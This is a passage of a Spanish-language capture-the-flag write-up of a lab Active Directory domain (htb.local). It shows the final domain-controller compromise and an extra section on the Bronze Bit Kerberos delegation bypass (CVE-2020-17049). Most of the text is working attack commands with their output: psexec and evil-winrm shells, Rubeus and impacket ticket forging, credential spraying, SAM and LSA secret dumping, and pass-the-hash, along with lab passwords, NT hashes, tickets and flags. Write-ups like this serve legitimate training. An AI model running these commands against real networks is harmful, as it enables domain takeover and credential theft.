PS C:\Users\Administrator\Documents> $SecPassword = ConvertTo-SecureString 'Myp@ssw0rd' -AsPlainText -Force
PS C:\Users\Administrator\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\Administrator', $SecPassword)  
PS C:\Users\Administrator\Documents> Invoke-Command -ComputerName dc1 -Credential $Cred -Command { whoami }
htb\administrator
PS C:\Users\Administrator\Documents> Invoke-Command -ComputerName dc1 -Credential $Cred -Command { hostname }
dc1
PS C:\Users\Administrator\Documents>

Nos conectamos simplemente con psexec hacia el DC1 con el parametro -k para autenticarnos por kerberos y obtenemos una cmd como nt authority\system

❯ impacket-psexec htb.local/Administrator:Myp@ssw0rd@dc1.htb.local -k  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc1.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file KZKXLYRd.exe
[*] Opening SVCManager on dc1.htb.local.....
[*] Creating service YklQ on dc1.htb.local.....
[*] Starting service YklQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
dc1

C:\Windows\system32>

Otra forma es solicitando un ticket con getTGT e importandolo a KRB5CCNAME

❯ impacket-getTGT htb.local/Administrator:Myp@ssw0rd  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Saving ticket in Administrator.ccache

❯ export KRB5CCNAME=Administrator.ccache

Podemos comprobar la autenticación con crackmapexec simplemente indicandole que use el ticket que se encuentra en kcache, nuevamente nos devuelve Pwn3d!

❯ crackmapexec smb dc1.htb.local -k --use-kcache
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         dc1.htb.local   445    DC1              [+] htb.local\ from ccache (Pwn3d!)

Nos conectamos nuevamente con psexec esta vez simplemente usando el ticket

❯ impacket-psexec htb.local/Administrator@dc1.htb.local -k -no-pass  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc1.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file QMiaZJce.exe
[*] Opening SVCManager on dc1.htb.local.....
[*] Creating service MiCD on dc1.htb.local.....
[*] Starting service MiCD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
dc1

C:\Windows\system32>

Para eliminar la restriccion de smb basta con eliminar al usuario Administrator del grupo global Protected Users haciendo uso del comando net group /del

C:\Windows\system32> net group "Protected Users" Administrator /del  
The command completed successfully.

C:\Windows\system32>

Ahora nos autenticamos a nivel de smb normalmente hacia todos los equipos del dominio, las credenciales son validas y hemos comprometido todos los equipos

❯ crackmapexec smb 192.168.3.201-203 -u Administrator -p Myp@ssw0rd
SMB         192.168.3.202   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         192.168.3.201   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:htb.local) (signing:False) (SMBv1:True)
SMB         192.168.3.203   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)
SMB         192.168.3.202   445    WEB              [+] htb.local\Administrator:Myp@ssw0rd (Pwn3d!)
SMB         192.168.3.201   445    DEV              [+] htb.local\Administrator:Myp@ssw0rd (Pwn3d!)
SMB         192.168.3.203   445    DC1              [+] htb.local\Administrator:Myp@ssw0rd (Pwn3d!)

Podemos simplemente conectarnos con evil-winrm al DC1 y leer la ultima flag

❯ evil-winrm -i dc1.htb.local -u Administrator -p Myp@ssw0rd  
PS C:\Users\Administrator.HTB\Documents> whoami
htb\administrator
PS C:\Users\Administrator.HTB\Documents> type ..\Desktop\flag.txt
HADES{Tam1ng_Kerber0s_Wi1l_gRant_4cCess_t0_H4des}
PS C:\Users\Administrator.HTB\Documents>

Extra 1

CVE-2020-17049 - WEB Administrator

En el ataque de GenericAll hacia el equipo WEB habiamos visto que no nos dejaba generar el ticket suplantando al usuario Administrator y lo haciamos como lee

PS C:\Users\Administrator\Documents> .\Rubeus.exe s4u /user:attackersystem$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:cifs/web.htb.local /domain:htb.local /ptt /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: S4U

[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'htb.local\attackersystem$'
[*] Using domain controller: 192.168.3.203:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIE/jCCBPqgAwIBBaEDAgEWooIEFTCCBBFhggQNMIIECaADAgEFoQsbCUhUQi5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJaHRiLmxvY2Fso4ID0zCCA8+gAwIBEqEDAgECooIDwQSCA72who5gCTsmlPWtwyTntyoJhTOccEs7PlZgVDu+KWKXA4M4IGGI+xb02MJst/Px4bUlnfpvDASbJeFqvUqyLoIKKOx/PbQSp+zLYv/MH12qJJlF5ulGkK2mds5/U3GmJIQa1CuVu2Gj9VtUTmrBaonFr7E6R31kur0runoJSuxkeNednnb0Lq+ceSZkgeBr3F32sB0XiTtxKQLIeT+KUM8O3bkXG3rLELq99l/LjfluIoANmS2/2bzrKMqRdJAGHv6IGpJilugzWcbC3bD2Sr2QMDl2w03xmSRw6+gDKhc4AVFx7YZM/kDAMcB0aGN2fhzUZAZbJEGeCbsmZDPRhvOPDtMukhpUw8gP36WpB7/UL/ZYBo+XnNCMgn/sSy9Yy9vW7K3hJLfDW5VED8Po36PXn33ubRp6quuE44nSlmOM3CnQvC/tlOk3o14OrnxzpJ8F6wuIx3lAPUk+7tE7v2TertXVpOzCPpKJ2vJMEiJJvMW/nwesgQHQlNetEWiyeJ92Y/Mfm05elz2BgHrAdHTEF1byT+2LWLdee70Ie1FHaL4YWrtSH0Ss7RNJmDVm9Pn6dT1IiJ0i/9YqgTJ6F99iuHISzeLyhl9K+BLfZcUyZDiNf3BYbVO4w2fBUFgW0AZbviAGiz1wAQVve1dw++s1y1qfNrZdbCz4ezu/mcCZF287CoIaW0JZ+PMGmWHIdseJh6IbHRg0XPjiUFSpvCicMrUHJrRPCB9RCYmsSad27w6zCo2wP7dmIRyWOoFQXA3VVFVNxFHubaRIgT5ug0UEJnHcLRjkd43zlhf6mTvIJo3zzNru+cICXYVeqzbfU6+EbPHUp/4jFGYKZ02UoZqyiMCOGmOoJchSQR5xTxoN0KQsVBjbGn2tL5OJByDHPNOhtOCkQjATMDI3QSFGevJnGIjJr6BCjPBLQ4U9YUIz24TFi/b2/EoLtg0RuISqd/bB1/wlFilkvfm5bMexNImgnwyDEDSJWVD8d29mhJwTJYAocw259r+aW7URAhlHScYC+wQtooVPorhFXcuMNEHVZbqkGtOTCtjoBbW7juwcZK3UGTAWG18foCZfK112C19bVXdl9nPNTJHixxWzTwSJjmqIUsw9GBRH2Wh29gmMANwjUmzMg4BHg9DjbYtueG1D9iCLdzQNkNTHBhKiNY3YlObJFYAO9uBnlRCKUgm/S2cdd53Ksm7d8qar9MG2g0Qk8JkHI02SNSibn3Bjzm6LU8/4UH9ibjDglqieVsHGJJoe2TrBlKzRQDyGHGajgdQwgdGgAwIBAKKByQSBxn2BwzCBwKCBvTCBujCBt6AbMBmgAwIBF6ESBBCaVmf4HAG9x1xe/xNwiFLAoQsbCUhUQi5MT0NBTKIcMBqgAwIBAaETMBEbD2F0dGFja2Vyc3lzdGVtJKMHAwUAQOEAAKURGA8yMDIzMDUxOTE5NTA1N1qmERgPMjAyMzA1MjAwNTUwNTdapxEYDzIwMjMwNTI2MTk1MDU3WqgLGwlIVEIuTE9DQUypHjAcoAMCAQKhFTATGwZrcmJ0Z3QbCWh0Yi5sb2NhbA==

[*] Action: S4U

[*] Building S4U2self request for: 'attackersystem$@HTB.LOCAL'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2self request to 192.168.3.203:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'attackersystem$@HTB.LOCAL'
[*] base64(ticket.kirbi):

      doIFQjCCBT6gAwIBBaEDAgEWooIEXTCCBFlhggRVMIIEUaADAgEFoQsbCUhUQi5MT0NBTKIcMBqgAwIBAaETMBEbD2F0dGFja2Vyc3lzdGVtJKOCBB0wggQZoAMCARehAwIBAaKCBAsEggQHTL+GuDZPlk5wM4gCQHNwMYcbXExh8ZNxVWSEIlU6MxJScLeuXN/nqQwkqNDU3LyjwMqZ6ZcGSNCzijKfe5A/SFnPeGPpmptc3nvurcdolSJ2kpkNfVXnDBRQBMGTs3B7R47ofzP51wSRA8T8rLMku3Aw2ZbPP9T9t6jZ0VAkwqusFrJ2027iwMuHxQZaDBBuEuyt1lnPVNOYcqsyJL/3YN54SzeD4+r+NBhGawr9p6PT5O9aeKmNKbpovbdPoDTrwZju3zC5L0jSs8Bpmxye2fh9xzDs/hteAg+LD277lrm+7cAb8OuLLbFWijBduJBRXHXCDnOAavyCNjvbB3eKf6qUsNbZb88y5YoI9hty2LWGMwuyv4dQVtShDtBf58zKtPtf2XYT3qDtiAKD2t+l4sRX+eTqnsRB7KdVmzHq13X24HJrvn8zzTGrgyiVtEY/qggRrIQTdcQKztCOTzr/G0mcgB0EOYDIOSvczdMc1ysZcWrC9OMjMqzqbtjU2GdvNd1NAVKBdINsiy4Zvb2UcIzIz1ybAVGbTn6VUFxbgG0p/OGgHN3vD1bYRy5Go58ewuHHF6P2WzubWAPHT3BLPgLedbsntj/vpVKzAPMZV6JB1YGCxfnq16U9YUs/tAc2iz3JCTiTmVqv5lsRO5RYawuU0UPA9Stokt9/kQFtZstaPFb/Q3M+AYvwY7Jvmko8h4EJUHW9iGOWRW4aSgc/Nn12jVrzvILTUqpOT+xRydTE5SK8ObsvR2GBpCAyyPigRy/JMvsQXzU0uCHoNyBIV692YTlxhXDCzww0RGM4FcevlyO4zNg8d+CEEmzq2MO5LAl1sSgq1Cz9QRP/ABP7zP3tANce4/9GE//PEtAOA0JrqFGwuAHGeH75ZxrS+0+K489OOMLf+5O6sN4k7bWGHTAIGWxceHn4R8ZzOWSP169BXD8mmy2cOSoRNr3NqKqGtZwfEwjpMsXtxW+5BLDXTwQOW5P5gu2rl4nllx7/S9HTmPC0SNWwwg+HwtHwVkG51aroChhxXzcQFMiun97eenEYUNBy/94v95ynHNFpRDYnniNWADcrdXM2mqXf8NYjoy7otegXcLrVJw09tyC7QMyCCwqXnFA1/i7njdfABVNmPGDknZ8SFfZ7JnDklJiEkq5R0U3A/nWUaFIq7/tDEbNO0X3oGjYu0xJayNI8b8QyTQdrwmw1+rJ6MM3ZAkxcvEdEGRhXSwkjVqeaGfHblHRX25EerWKkhZfWcHECUFFgKbhOczc7jdl0y2GOh1QRc7Xx6qC5CMCs4TRjI+iKwIWM7fL5bpeuNqWZog8ziZT0G7dWHk6NKMTwfPhJU9TxtD8xYl6CTUCxR09w+s5OTXTCw+Kq4JOjgdAwgc2gAwIBAKKBxQSBwn2BvzCBvKCBuTCBtjCBs6AbMBmgAwIBF6ESBBB9JGEFheiVht8O+2GfLGDmoQsbCUhUQi5MT0NBTKIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3KjBwMFAAChAAClERgPMjAyMzA1MTkxOTUwNThaphEYDzIwMjMwNTIwMDU1MDU3WqcRGA8yMDIzMDUyNjE5NTA1N1qoCxsJSFRCLkxPQ0FMqRwwGqADAgEBoRMwERsPYXR0YWNrZXJzeXN0ZW0k  

[*] Impersonating user 'Administrator' to target SPN 'cifs/web.htb.local'
[*] Building S4U2proxy request for service: 'cifs/web.htb.local'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2proxy request to domain controller 192.168.3.203:88

[X] KRB-ERROR (13) : KDC_ERR_BADOPTION

PS C:\Users\Administrator\Documents>

Hay un metodo alternativo que es aprovechando el CVE-2020-17049 o Bronze Bit Attack que nos permite falsiciar el ticket cuando somos un usuario de servicio, por suerte Rubeus tiene contemplado esto con solo el parametro /bronzebit, con esto nos genera el ticket suplantando al usuario Administrator sin problemas

PS C:\Users\Administrator\Documents> .\Rubeus.exe s4u /user:attackersystem$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:cifs/web.htb.local /domain:htb.local /ptt /nowrap /bronzebit

   ______        _                       
  (_____ \      | |                      
   _____) )_   _| |__  _____ _   _  ___  
  |  __  /| | | |  _ \| ___ | | | |/___) 
  | |  \ \| |_| | |_) ) ____| |_| |___ | 
  |_|   |_|____/|____/|_____)____/(___/  

  v2.2.3

[*] Action: S4U

[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'htb.local\attackersystem$' 
[*] Using domain controller: 192.168.3.203:88 
[+] TGT request successful! 
[*] base64(ticket.kirbi):

      doIE/jCCBPqgAwIBBaEDAgEWooIEFTCCBBFhggQNMIIECaADAgEFoQsbCUhUQi5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJaHRiLmxvY2Fso4ID0zCCA8+gAwIBEqEDAgECooIDwQSCA735w5H87Rqj/DhdbzBcbYACTUhvt/kUxwNZuxNOqQqRzYWl6I/RuoY3dDr3d9H1C6GUDbOQtrwk/z3JTj5pZQYwtGXezJmSoRT8iMST3Ui7/ZOd7B25Fe7hrBYCrzNq5ey60VPTuXj+pqj8hPzYlVkxt+XCU5kgg7u9C/LQAyiR0z02pRlTrmDaEvc+27JrpFOeAhQ7sBRIk/NJHUz4GuH3pyNkowjI3DYOnjfZGOTVyrH8HbwZvm3YL1wTlGWpgLoWQyE805JTxYiGxO11ShD92YVb0o4vah7YXae9YxzmZM87NISAeIXu8WYcWZcFM51nGx6xvilpkI4v1gRlNDRNtzD2GprD+mM8Lml9YWjzs75GNPYopUmeOA+eBK+tbo+tXJHUmxZiecfNaeWdzcFYkKhGutFPL/+OaBKbJYAl8IV7qU3v5JgbBNmuPvnHB8swRkvy4ZeDlGDyeiPuBc+jPQmxtOMlg6m2iGzxNssDafVyIp5lewdNOKlwrd+zdMLbVcM1iT4i4qt63pMVFL5ZREK6Y9G5Fp3KSHBOR54yFlHf7Zs4JtzjHcWKzE06lhVmlRQTCFK77LHckYJAf7TKxj0jYRfVGVmWrqZ8FSyG/3wc3A2ovXxSFfxxdCeiLUnoKuqcNNKHahRq0x8OFrx1MsUarYJeyulp8D64x2oOpd9Z0yUHeQPFdRwFLnhDIv8AnSBIh3+tI3eik/KDK02eaPcStWI2auyiuy4saXE6ath5aJ2sQ1VS9hux3kfvnSnZBxgkWmeWXRSyhU0C5VaV4oXsWrzt7Qcj0hah/J3pC+9Op4JSc/0v/8FmL9EKROL61Gtm0cXQew8azAcMps62frKoWf4Nv5ZDiQC4kbNndR5H/ifjE3e2tqx0h08qTNZxCFGVn1bxCBoiunWfiWakZxEh7v/WaxzcNIUhLe9u/D5PsMz6PaXCgsVohTLjTfXTeQnnGsairz7gEpTR/uGWplpdhHX0+49WpLOUrjtBwblAQD1HpgCjEgbwQusWWK8sCY4Ikx9cNUY3cxzLXjnO26644u7Ztbc1nwmg0/1tDP69c5yERj34ThjhDzSPe/1cqZrDzzAmBAHaHFUbpLdW4mUQYqP5ABc5priQbWc4RgPPkxiaHqEIj4PW7jAxiGb61hSfUdr07BZ/PviGq8dvSdSVc+5KcNC7mmY56AvWNFhP3OtPRXIyFDANaiHFB67RCJXmFvgzMytlmEH7xcU9I1BUqpmF0WiiryTOJRmWC91HJlpZHIkL3DWNvDOjgdQwgdGgAwIBAKKByQSBxn2BwzCBwKCBvTCBujCBt6AbMBmgAwIBF6ESBBAQln/A5RJnLMuVjTnGBGWloQsbCUhUQi5MT0NBTKIcMBqgAwIBAaETMBEbD2F0dGFja2Vyc3lzdGVtJKMHAwUAQOEAAKURGA8yMDIzMDUxOTA0MjIyOFqmERgPMjAyMzA1MTkxNDIyMjhapxEYDzIwMjMwNTI2MDQyMjI4WqgLGwlIVEIuTE9DQUypHjAcoAMCAQKhFTATGwZrcmJ0Z3QbCWh0Yi5sb2NhbA==

[*] Action: S4U

[*] Building S4U2self request for: 'attackersystem$@HTB.LOCAL'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2self request to 192.168.3.203:88
[+] S4U2self success!
[*] Bronze Bit flag passed, flipping forwardable flag on. Original flags: name_canonicalize, pre_authent, renewable
[*] Flags changed to: name_canonicalize, pre_authent, renewable, forwardable
[*] Got a TGS for 'Administrator' to 'attackersystem$@HTB.LOCAL'
[*] base64(ticket.kirbi):

      doIFOjCCBTagAwIBBaEDAgEWooIEVTCCBFFhggRNMIIESaADAgEFoQsbCUhUQi5MT0NBTKIcMBqgAwIBAaETMBEbD2F0dGFja2Vyc3lzdGVtJKOCBBUwggQRoAMCARehAwIBAaKCBAMEggP/uVyqshvb2mcTlsJL0gHsmck94hc3Xq5wYPK1LBOg/+bukck0ocNNrT6Ztybr+M/Uzw+n2Enit92wtWUPL7/lD2CtdHX68fWNjKFGF953Lvs5oQYC5PGfcWSvBH6ufXpdagq/kM0UmCX5IA0BzSqR3aNkP/YIcWW+pjBcDjTKQllCJsGNwZR9TXHX/n3yeqiQ3zkns9eKKMleJHJFFplDCYU5H7GGgePCuKhihwlSyWK4Q3+hY9iXjg/j+DMJmggx8rE3/oLaV28v5lAVm4qK3CpKzSMyJQi176VHEVtRiRdtnq3Ct9zHJI5/j1sZNVNJyN/d2uORgh7WUS1QeYa7Ffv0tZUF+QtUGtdFkHafGQ1oaXAw92DhXdS/dLumB548C3g21UAuGA1nq/7tJiEzjS6XUrB0B+FB9cwWu3S8B1g721TM0sEdfOIc+yWXCq6/fHuyq6MnW9sob5UnmElP5Ph8j/2YYx/30Lmv3FenLjgnnOup/DebSTxF3qCBTyqGWO+LdSN/cOGORFjdQEJHKP9fokbQ/RR70NgXivx1ZGHTmIF6tuHKTGEOVDEUyi5oqDxf518zahjgzakrWz0p91z+TM8HcZoW5m3xhjtmyMjRjWV8MdwxLuja0W/hWwW640jle+N/t28ancsMx/AqUcQ8p7DwvY8pjQgdhr81wXvwHT5ab5cQmdlDu7vLEna3ibHYqFC/HM3ntyNV7Zc0YGE0TTMfo4r0/aCF95XkMWzxH/DH+EUYgkswjPSQuN4t+sfd90/Kz3JHRyJzZwRYAbijyy4e3ozeuRQ6nsWQ0UdD6yh1oEQ+I+SjEsYMj4yrQZCb+w+zw9uqyITPPrAOFv6bthRJrfLtBYrNwJahVqZD3DYyDJZFOWyuFMwhxoNRccZsAD6gfkN0W5Nmc9oFF6khEyj0Edt6lCr2Tf4/GsqXBD8N/A8YrbOHnzb0KpSQcVHHeY6zeyGdeu1erJ4jrlDgB7uW5GWmqxiD5rINDHmikXHZryij9yZuPiKtUzvF9Q7mkowYbglqqsKmdkx4zuXZ3JsmwfRm2q9i7wNmipfPKRFl2816DZH5c/Cjj274WyVi7K7rmM30yNdStVpjlIpmDT5SudmmEUzRyfb8gYotZN1hTiJi+LZkI68l42lxsIdgR8+hUq4YGyxwyTFnjbJK7mK1rUEzDqqzVShWrEkM607PV62P+POj6pMujrW+tVnwjzMTCopGgA7FX6XpWiLnM0nScA5aAGitw3yTPD9usKNnTrmaTKAxPbvw4SrUVRsD/WqH8o5U1lrjgYQt0rj282V3z8tKX0HhL9W3+c15EYR93WGE0Mo8syFOEsolmW527hrl4gim+5PYzB9io4HQMIHNoAMCAQCigcUEgcJ9gb8wgbyggbkwgbYwgbOgGzAZoAMCARehEgQQEjrqRtoSppUB+SsuA+B6YqELGwlIVEIuTE9DQUyiGjAYoAMCAQqhETAPGw1BZG1pbmlzdHJhdG9yowcDBQBAoQAApREYDzIwMjMwNTE5MDQyMjI4WqYRGA8yMDIzMDUxOTE0MjIyOFqnERgPMjAyMzA1MjYwNDIyMjhaqAsbCUhUQi5MT0NBTKkcMBqgAwIBAaETMBEbD2F0dGFja2Vyc3lzdGVtJA==

[*] Impersonating user 'Administrator' to target SPN 'cifs/web.htb.local'
[*] Building S4U2proxy request for service: 'cifs/web.htb.local'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2proxy request to domain controller 192.168.3.203:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/web.htb.local':

      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  

[+] Ticket successfully imported!

PS C:\Users\Administrator\Documents>

Con el ticket importado podemos leer la flag en web.htb.local en el recurso C$

PS C:\Users\Administrator\Documents> type \\web.htb.local\C$\Users\Administrator\Desktop\flag.txt  
HADES{Why_llmnr_wh3n_y0u_got_adidns}
PS C:\Users\Administrator\Documents>

Otra forma es tomar el ticket que nos devolvio Rubeus suplantando a Administrator y convertirlo de kirbi a ccache, despues exportarlo en la varible KRB5CCNAME

❯ base64 -d kirbi.b64 > ticket.kirbi

❯ impacket-ticketConverter ticket.kirbi WEB.ccache
Impacket v0.11.0 - Copyright 2023 Fortra

[*] converting kirbi to ccache...
[+] done

❯ export KRB5CCNAME=WEB.ccache

Ahora usando el ticket como autenticacion podemos comprobar con crackmapexec hacia web.htb.local, el resultado es que es valida y devuelve Pwn3d!

❯ crackmapexec smb web.htb.local -k --use-kcache
SMB         web.htb.local   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         web.htb.local   445    WEB              [+] htb.local\ from ccache (Pwn3d!)

Otra forma mas sencilla de general el ticket es con getST de impacket suplantando a Administrator y usando el parametro -force-forwardable para explotar el CVE

❯ impacket-getST -spn cifs/web.htb.local htb.local/'attackersystem$':123456 -impersonate Administrator -force-forwardable  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Forcing the service ticket to be forwardable
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

❯ export KRB5CCNAME=Administrator.ccache

Este ticket tambien deberia ser valido para autenticarnos contra web.htb.local

❯ crackmapexec smb web.htb.local -k --use-kcache
SMB         web.htb.local   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         web.htb.local   445    WEB              [+] htb.local\ from ccache (Pwn3d!)

Usando esa autenticacion ccache podemos con psexec obtener una shell en web

❯ impacket-psexec htb.local/Administrator@web.htb.local -k -no-pass  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on web.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file vmkgFQEM.exe
[*] Opening SVCManager on web.htb.local.....
[*] Creating service fbps on web.htb.local.....
[*] Starting service fbps.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
web

C:\Windows\system32>

O con crackmapexec dumpear la sam del equipo, para asi poder ver los hashes

❯ crackmapexec smb web.htb.local -k --use-kcache --sam
SMB         web.htb.local   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         web.htb.local   445    WEB              [+] htb.local\ from ccache (Pwn3d!)  
SMB         web.htb.local   445    WEB              [+] Dumping SAM hashes
SMB         web.htb.local   445    WEB              Administrator:500:aad3b435b51404eeaad3b435b51404ee:e57231f8ebcc24a122631564147361cc:::
SMB         web.htb.local   445    WEB              Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         web.htb.local   445    WEB              [+] Added 2 SAM hashes to the database

Simplemente nos conectamos con evil-winrm haciendo un passthehash utilizando el hash NT de Administrator y obtenemos una powershell como el en WEB

❯ evil-winrm -i web.htb.local -u Administrator -H e57231f8ebcc24a122631564147361cc  
PS C:\Users\Administrator\Documents> whoami
web\administrator
PS C:\Users\Administrator\Documents>

Aunque si en lugar de dumpear la sam dumpeamos los secretos lsa podemos ver la contraseña de Administrator en texto claro y conectarnos con evil-winrm

❯ crackmapexec smb web.htb.local -k --use-kcache --lsa
SMB         web.htb.local   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         web.htb.local   445    WEB              [+] htb.local\ from ccache (Pwn3d!)
SMB         web.htb.local   445    WEB              [+] Dumping LSA secrets
SMB         web.htb.local   445    WEB              HTB.LOCAL/remote_user:$DCC2$10240#remote_user#021f10dc08753a885186720dc02631c3
SMB         web.htb.local   445    WEB              HTB\WEB$:plain_password_hex:66de0e517ef565eea1a53cdfa897673babcaf88dc7f46577dc86dfbbf6b40ada8fd4dbd6dc5dd2939067f28332dfbbd68675eb00160e72fb1b4d948d58780935e050ef7030fdad86e6df08ee32ea25222d21e1ea3214227791a716904911cf4c82124e6b94c4985d6b86d54756b3915e88f0ceccea97ed77dda0b5361aab2e7aaa9010464a38965b976959a1ef769e6807f913e702c90a1d2aee4ba634a7c7f8f62aa9853799c1c21929b5254d6afb5d42e35ee2f93eb28188795781c955376cc63821c2434868ca66346542ad9fca59d128876b8c51f9456b0eb47b95d4edb627c4c7ba296407413228adcdeacaa0dc  
SMB         web.htb.local   445    WEB              HTB\WEB$:aad3b435b51404eeaad3b435b51404ee:549fd7eb92d4bd6e0352991dbc6e0a7a:::
SMB         web.htb.local   445    WEB              web\administrator:Myp@ssw0rd
